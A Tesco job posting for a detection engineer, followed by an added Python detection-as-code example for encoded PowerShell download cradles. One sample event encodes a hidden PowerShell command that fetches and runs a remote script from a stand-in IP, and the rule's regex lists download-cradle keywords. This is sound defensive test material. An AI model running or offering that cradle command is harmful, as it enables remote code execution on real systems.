As a Cyber Security Detection Engineer, you will lead the development, implementation, and continuous improvement of Tesco's cyber security detection capability. You will be required to understand the changing threat landscape, identify opportunities for improvement, establish new detections, and ensure comprehensive detection coverage for the organization. You will work closely with security operations, engineering, and risk & compliance teams in a fast-paced, agile environment.
Responsibilities include developing and driving the cyber security detection capability both operationally and strategically for the Tesco Group. You should design effective detection logic, ensure detections are robust and thoroughly tested, and make alerts and supporting information accessible and understandable to operational cyber security teams.
You will prioritize the needs of incident responders and operational teams, ensuring detections and alerts are relevant and actionable. The detection capability must be adaptable for on-premises, private, and public cloud environments, operating at scale across diverse asset types.
You may also support cyber security incidents, participate in threat hunts, and collaborate with other security teams to automate processes and standardize responses.
Security Engineering Skills
* Threat Led: Ability to assess and validate threat information, analyze trends, threat actor TTPs, and translate intelligence into actionable data.
* Secure & Test-Driven Engineering: Knowledge of cyber security frameworks (MITRE ATT&CK, Lockheed Martin Cyber Kill Chain), the secure development lifecycle, detection development, code review, and vulnerability assessment.
* Research: Ability to define research goals, generate detection ideas, and communicate findings effectively.
Relevant Experience
* Developing queries for threat detection.
* Knowledge of Windows, macOS, or Linux operating systems.
* Ability to work independently and in teams.
* Understanding attacker TTPs and translating threat intelligence into detection logic.
* Proficiency with detection technologies and scripting languages (e.g., KQL, SPL, Python, PowerShell).
Desirable Skills
* Knowledge of cloud infrastructure, security, and APIs.
* Experience with offensive security tools and techniques.
* Development of detections as code.
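As an added illustration of the "detections as code" practice listed above (example code written for this page, not Tesco's own tooling): one detection rule for encoded PowerShell download cradles (MITRE ATT&CK T1059.001) expressed in Python, evaluated over constructed process-creation events, with the result shaped so that an incident responder sees the decoded command rather than a raw base64 blob. The event field names, the allowlisted parent path, and the payload patterns are assumptions chosen for the example.

```python
"""Detection-as-code example: a rule, its evaluation logic, and sample events.

Added example, not Tesco's code. Event fields are assumed to follow a
Sysmon/4688-style process-creation schema; all events below are constructed.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Rule:
    name: str
    attack_id: str                      # MITRE ATT&CK technique ID
    severity: str
    allowlisted_parents: Tuple[str, ...] = ()   # parents whose encoded commands are routine (assumed)


# PowerShell accepts several abbreviations of -EncodedCommand; longest first for clarity.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|encodedc|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
# Download-cradle / in-memory execution indicators to look for in the decoded script (assumed list).
SUSPICIOUS_PAYLOAD = re.compile(r"(?i)(iex|invoke-expression|downloadstring|net\.webclient|frombase64string)")

ENCODED_POWERSHELL = Rule(
    name="Encoded PowerShell with download cradle",
    attack_id="T1059.001",
    severity="high",
    allowlisted_parents=(r"C:\Program Files\MgmtAgent\agent.exe",),  # hypothetical management agent
)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text).

    Malformed input returns None instead of raising, so one bad event
    cannot crash the rule for every other event in the batch.
    """
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(rule: Rule, event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert for one event if it matches the rule, else None."""
    if not event.get("image", "").lower().endswith("powershell.exe"):
        return None
    if event.get("parent_image", "") in rule.allowlisted_parents:
        return None
    match = ENCODED_FLAG.search(event.get("cmdline", ""))
    if not match:
        return None
    decoded = decode_encoded_command(match.group(1))
    if decoded is None or not SUSPICIOUS_PAYLOAD.search(decoded):
        return None
    return {
        "rule": rule.name,
        "attack_id": rule.attack_id,
        "severity": rule.severity,
        "host": event.get("host", ""),
        "user": event.get("user", ""),
        "decoded_command": decoded,     # surfaced so responders need not decode by hand
    }


def run(rule: Rule, events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Evaluate a rule over a batch of events and return the alerts raised."""
    return [alert for alert in (evaluate(rule, e) for e in events) if alert]


def _enc(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (test helper)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: one true positive, one benign encoded command,
# one allowlisted parent, one malformed blob, and one non-PowerShell process.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"host": "ws02", "user": "bob", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _enc("Get-Service -Name Spooler")},
    {"host": "ws03", "user": "svc-agent", "image": PS, "parent_image": r"C:\Program Files\MgmtAgent\agent.exe",
     "cmdline": "powershell.exe -enc " + _enc("IEX (Get-Content C:\\agent\\task.ps1 -Raw)")},
    {"host": "ws04", "user": "carol", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -enc NotBase64!!!"},
    {"host": "ws05", "user": "dave", "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c whoami"},
]


if __name__ == "__main__":
    for alert in run(ENCODED_POWERSHELL, SAMPLE_EVENTS):
        print(alert)
```

The point of keeping the rule, its sample events and its assertions in one repository is that a change to the regex or the allowlist is reviewed and tested like any other code change before it reaches the SIEM, and the true-positive and false-positive cases travel with the rule as documentation of what it is meant to catch.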